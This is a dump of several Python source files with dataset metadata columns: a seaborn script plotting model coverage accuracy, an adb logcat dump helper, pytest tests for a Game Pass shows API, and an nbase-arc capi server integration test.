plt.figure(figsize=(7, 3))
order = plot_df.groupby('model', as_index=False)['hit'].agg('median').sort_values('hit')['model']
colors = [('C0' if 'mReasoner' in x else 'C2') for x in order]
sns.boxplot(x='model', y='hit', data=plot_df, order=order, palette=colors)
plt.axhline(y=mfa_median, ls='--', color='C7', zorder=10)
plt.text(0.002, mfa_median + 0.015, 'MFA', color='C7', fontsize=10, transform=plt.gca().transAxes)
plt.xlabel('')
plt.yticks(np.arange(0, 1.1, 0.1))
plt.ylabel('Coverage Accuracy')
plt.tight_layout()
plt.savefig('visualizations/performances.pdf')
plt.show()
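# Example invocation (hypothetical file names; the script expects the
# group-level and individual-level result CSVs as its two arguments):
#
#   python plot_performances.py group_results.csv indiv_results.csv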
| import sys
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
if len(sys.argv) != 3:
print('usage: python plot_performances.py <group_csv> <indiv_csv>')
exit()
group_file = sys.argv[1]
indiv_file = sys.argv[2]
# Load the data
df_group = pd.read_csv(group_file)
df_indiv = pd.read_csv(indiv_file)
df = pd.concat([df_group, df_indiv], sort=True)
# Prepare the data for plotting
plot_df = df.groupby(['model', 'id'], as_index=False)['hit'].agg('mean')
mfa_df = plot_df.loc[plot_df['model'] == 'MFA']
mfa_median = mfa_df['hit'].median()
plot_df = plot_df.loc[plot_df['model'] != 'MFA']
# Plot the data
sns.set(style='whitegrid', palette='colorblind')
plt.figure(figsize=(7, 3))
order = plot_df.groupby('model', as_index=False)['hit'].agg('median').sort_values('hit')['model']
colors = [('C0' if 'mReasoner' in x else 'C2') for x in order]
sns.boxplot(x='model', y='hit', data=plot_df, order=order, palette=colors)
plt.axhline(y=mfa_median, ls='--', color='C7', zorder=10)
plt.text(0.002, mfa_median + 0.015, 'MFA', color='C7', fontsize=10, transform=plt.gca().transAxes)
plt.xlabel('')
plt.yticks(np.arange(0, 1.1, 0.1))
plt.ylabel('Coverage Accuracy')
plt.tight_layout()
plt.savefig('visualizations/performances.pdf')
plt.show()
| en | 0.488383 | # Load the data # Prepare the data for plotting # Plot the data | 2.499362 | 2 |
src/helpers.py | demirdagemir/thesis | 0 | 10397 | <filename>src/helpers.py
from Aion.utils.data import getADBPath
# NOTE: prettyPrint is called below but was not imported in the original
# snippet; it is assumed here to come from Aion's console helpers.
from Aion.utils.graphics import prettyPrint
import subprocess
def dumpLogCat(apkTarget):
# Aion/shared/DroidutanTest.py
# Define frequently-used commands
# TODO: Refactor adbID
adbID = "192.168.58.101:5555"
adbPath = getADBPath()
dumpLogcatCmd = [adbPath, "-s", adbID, "logcat", "-d"]
    clearLogcatCmd = [adbPath, "-s", adbID, "logcat", "-c"]
# 5. Dump the system log to file
logcatFile = open(apkTarget.replace(".apk", ".log"), "w")
prettyPrint("Dumping logcat")
subprocess.Popen(dumpLogcatCmd, stderr=subprocess.STDOUT, stdout=logcatFile).communicate()[0]
logcatFile.close()
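# Hypothetical call site (the APK path is invented): this writes the
# device logcat next to the APK as a .log file; note that clearLogcatCmd
# is built above but never executed.
#
#   dumpLogCat("/home/analyst/samples/app.apk")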
| <filename>src/helpers.py
from Aion.utils.data import getADBPath
# NOTE: prettyPrint is called below but was not imported in the original
# snippet; it is assumed here to come from Aion's console helpers.
from Aion.utils.graphics import prettyPrint
import subprocess
def dumpLogCat(apkTarget):
# Aion/shared/DroidutanTest.py
# Define frequently-used commands
# TODO: Refactor adbID
adbID = "192.168.58.101:5555"
adbPath = getADBPath()
dumpLogcatCmd = [adbPath, "-s", adbID, "logcat", "-d"]
    clearLogcatCmd = [adbPath, "-s", adbID, "logcat", "-c"]
# 5. Dump the system log to file
logcatFile = open(apkTarget.replace(".apk", ".log"), "w")
prettyPrint("Dumping logcat")
subprocess.Popen(dumpLogcatCmd, stderr=subprocess.STDOUT, stdout=logcatFile).communicate()[0]
logcatFile.close()
| en | 0.749883 | # Aion/shared/DroidutanTest.py # Define frequently-used commands # TODO: Refactor adbID # 5. Dump the system log to file | 2.286941 | 2 |
tests/test_show.py | domi007/pigskin | 6 | 10398 | from collections import OrderedDict
import pytest
import vcr
try: # Python 2.7
# requests's ``json()`` function returns strings as unicode (as per the
# JSON spec). In 2.7, those are of type unicode rather than str. basestring
# was created to help with that.
# https://docs.python.org/2/library/functions.html#basestring
basestring = basestring
except NameError:
basestring = str
@pytest.mark.incremental
class TestShow(object):
"""These don't require authentication to Game Pass."""
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_desc(gp):
shows = gp.shows
for s in shows:
show = shows[s]
            assert isinstance(show.desc, basestring)
# content is not required
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_logo(gp):
shows = gp.shows
for s in shows:
show = shows[s]
            assert isinstance(show.logo, basestring)
assert show.logo
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_name(gp):
shows = gp.shows
for s in shows:
show = shows[s]
            assert isinstance(show.name, basestring)
assert show.name
@vcr.use_cassette('public_API/europe_show_seasons.yaml')
@staticmethod
def test_seasons(gp):
shows = gp.shows
for s in shows:
show = shows[s]
assert type(show.seasons) is OrderedDict
assert show.seasons
prev = 9999
for s in show.seasons:
season = show.seasons[s]
# TODO: assert it has content
# TODO: assert is type season
# make sure the years look sane-ish
assert int(s) > 2000 and int(s) < 2050
# make sure it's sorted high to low
assert int(prev) > int(s)
prev = s
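# Minimal way to run just this class (assuming pytest plus the recorded
# cassettes under public_API/ are available; the `gp` fixture is expected
# to come from the project's conftest):
#
#   python -m pytest tests/test_show.py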
| from collections import OrderedDict
import pytest
import vcr
try: # Python 2.7
# requests's ``json()`` function returns strings as unicode (as per the
# JSON spec). In 2.7, those are of type unicode rather than str. basestring
# was created to help with that.
# https://docs.python.org/2/library/functions.html#basestring
basestring = basestring
except NameError:
basestring = str
@pytest.mark.incremental
class TestShow(object):
"""These don't require authentication to Game Pass."""
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_desc(gp):
shows = gp.shows
for s in shows:
show = shows[s]
            assert isinstance(show.desc, basestring)
# content is not required
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_logo(gp):
shows = gp.shows
for s in shows:
show = shows[s]
            assert isinstance(show.logo, basestring)
assert show.logo
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_name(gp):
shows = gp.shows
for s in shows:
show = shows[s]
            assert isinstance(show.name, basestring)
assert show.name
@vcr.use_cassette('public_API/europe_show_seasons.yaml')
@staticmethod
def test_seasons(gp):
shows = gp.shows
for s in shows:
show = shows[s]
assert type(show.seasons) is OrderedDict
assert show.seasons
prev = 9999
for s in show.seasons:
season = show.seasons[s]
# TODO: assert it has content
# TODO: assert is type season
# make sure the years look sane-ish
assert int(s) > 2000 and int(s) < 2050
# make sure it's sorted high to low
assert int(prev) > int(s)
prev = s
| en | 0.921252 | # Python 2.7 # requests's ``json()`` function returns strings as unicode (as per the # JSON spec). In 2.7, those are of type unicode rather than str. basestring # was created to help with that. # https://docs.python.org/2/library/functions.html#basestring These don't require authentication to Game Pass. # content is not required # TODO: assert it has content # TODO: assert is type season # make sure the years look sane-ish # make sure it's sorted high to low | 2.609136 | 3 |
integration_test/basic_op_capi.py | cl9200/nbase-arc | 0 | 10399 | <reponame>cl9200/nbase-arc<gh_stars>0
#
# Copyright 2015 N<NAME>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import subprocess
import unittest
import testbase
import default_cluster
import util
import os
import constant
import config
import time
import telnetlib
import signal
class TestBasicOpCAPI(unittest.TestCase):
cluster = config.clusters[2]
@classmethod
def setUpClass(cls):
return 0
@classmethod
def tearDownClass(cls):
return 0
def setUp(self):
util.set_process_logfile_prefix( 'TestBasicOp_%s' % self._testMethodName )
self.conf_checker = default_cluster.initialize_starting_up_smr_before_redis(self.cluster, arch=self.arch)
self.assertIsNotNone(self.conf_checker, 'failed to initialize cluster')
def tearDown(self):
testbase.defaultTearDown(self)
def run_capi_server(self):
# run capi test server
_capi_server_conf = """
zookeeper 127.0.0.1:2181
cluster_name %s
port 6200
daemonize no
num_conn_per_gw 2
init_timeout_millis 10000
log_level INFO
log_file_prefix "capi_server"
max_fd 4096
conn_reconnect_millis 1000
zk_reconnect_millis 1000
zk_session_timeout_millis 10000
local_proxy_query_timeout_millis 10000
""" % self.cluster['cluster_name']
old_cwd = os.path.abspath( os.getcwd() )
os.chdir(util.capi_dir(0))
f = open('capi_server.conf', 'w')
f.write(_capi_server_conf)
f.close()
os.chdir(old_cwd)
        if self.arch == 32:
cmd = "./%s capi_server.conf" % constant.CAPI32_TEST_SERVER
else:
cmd = "./%s capi_server.conf" % constant.CAPI_TEST_SERVER
capi_server = util.exec_proc_async(util.capi_dir(0),
cmd, True, None, subprocess.PIPE, None)
# ping check
while True:
try:
t = telnetlib.Telnet('127.0.0.1', 6200)
break
except:
time.sleep(1)
continue
t.write("ping\r\n")
t.read_until('+PONG\r\n')
t.close()
return capi_server
def stop_process(self, capi_server):
capi_server.send_signal(signal.SIGTERM)
capi_server.wait()
def test_basic_op_capi(self):
capi_server = self.run_capi_server()
f = open("%s/test_basicop_output_capi%d" % (constant.logdir, self.arch), 'w')
p = util.exec_proc_async("../redis-%s" % constant.REDISVER,
"./runtest_gw --accurate --gw-port 6200",
True, None, f, None)
ret = p.wait()
f.close()
self.assertEquals(0, ret)
self.stop_process(capi_server)
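# Hypothetical driver (not in the original file): `self.arch` is never set
# in this snippet, so it is presumably injected by the test runner, e.g.:
#
#   TestBasicOpCAPI.arch = 64
#   unittest.main()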
| #
# Copyright 2015 N<NAME>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import subprocess
import unittest
import testbase
import default_cluster
import util
import os
import constant
import config
import time
import telnetlib
import signal
class TestBasicOpCAPI(unittest.TestCase):
cluster = config.clusters[2]
@classmethod
def setUpClass(cls):
return 0
@classmethod
def tearDownClass(cls):
return 0
def setUp(self):
util.set_process_logfile_prefix( 'TestBasicOp_%s' % self._testMethodName )
self.conf_checker = default_cluster.initialize_starting_up_smr_before_redis(self.cluster, arch=self.arch)
self.assertIsNotNone(self.conf_checker, 'failed to initialize cluster')
def tearDown(self):
testbase.defaultTearDown(self)
def run_capi_server(self):
# run capi test server
_capi_server_conf = """
zookeeper 127.0.0.1:2181
cluster_name %s
port 6200
daemonize no
num_conn_per_gw 2
init_timeout_millis 10000
log_level INFO
log_file_prefix "capi_server"
max_fd 4096
conn_reconnect_millis 1000
zk_reconnect_millis 1000
zk_session_timeout_millis 10000
local_proxy_query_timeout_millis 10000
""" % self.cluster['cluster_name']
old_cwd = os.path.abspath( os.getcwd() )
os.chdir(util.capi_dir(0))
f = open('capi_server.conf', 'w')
f.write(_capi_server_conf)
f.close()
os.chdir(old_cwd)
        if self.arch == 32:
cmd = "./%s capi_server.conf" % constant.CAPI32_TEST_SERVER
else:
cmd = "./%s capi_server.conf" % constant.CAPI_TEST_SERVER
capi_server = util.exec_proc_async(util.capi_dir(0),
cmd, True, None, subprocess.PIPE, None)
# ping check
while True:
try:
t = telnetlib.Telnet('127.0.0.1', 6200)
break
except:
time.sleep(1)
continue
t.write("ping\r\n")
t.read_until('+PONG\r\n')
t.close()
return capi_server
def stop_process(self, capi_server):
capi_server.send_signal(signal.SIGTERM)
capi_server.wait()
def test_basic_op_capi(self):
capi_server = self.run_capi_server()
f = open("%s/test_basicop_output_capi%d" % (constant.logdir, self.arch), 'w')
p = util.exec_proc_async("../redis-%s" % constant.REDISVER,
"./runtest_gw --accurate --gw-port 6200",
True, None, f, None)
ret = p.wait()
f.close()
self.assertEquals(0, ret)
self.stop_process(capi_server) | en | 0.706632 | # # Copyright 2015 N<NAME>. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # run capi test server zookeeper 127.0.0.1:2181 cluster_name %s port 6200 daemonize no num_conn_per_gw 2 init_timeout_millis 10000 log_level INFO log_file_prefix "capi_server" max_fd 4096 conn_reconnect_millis 1000 zk_reconnect_millis 1000 zk_session_timeout_millis 10000 local_proxy_query_timeout_millis 10000 # ping check | 1.802132 | 2 |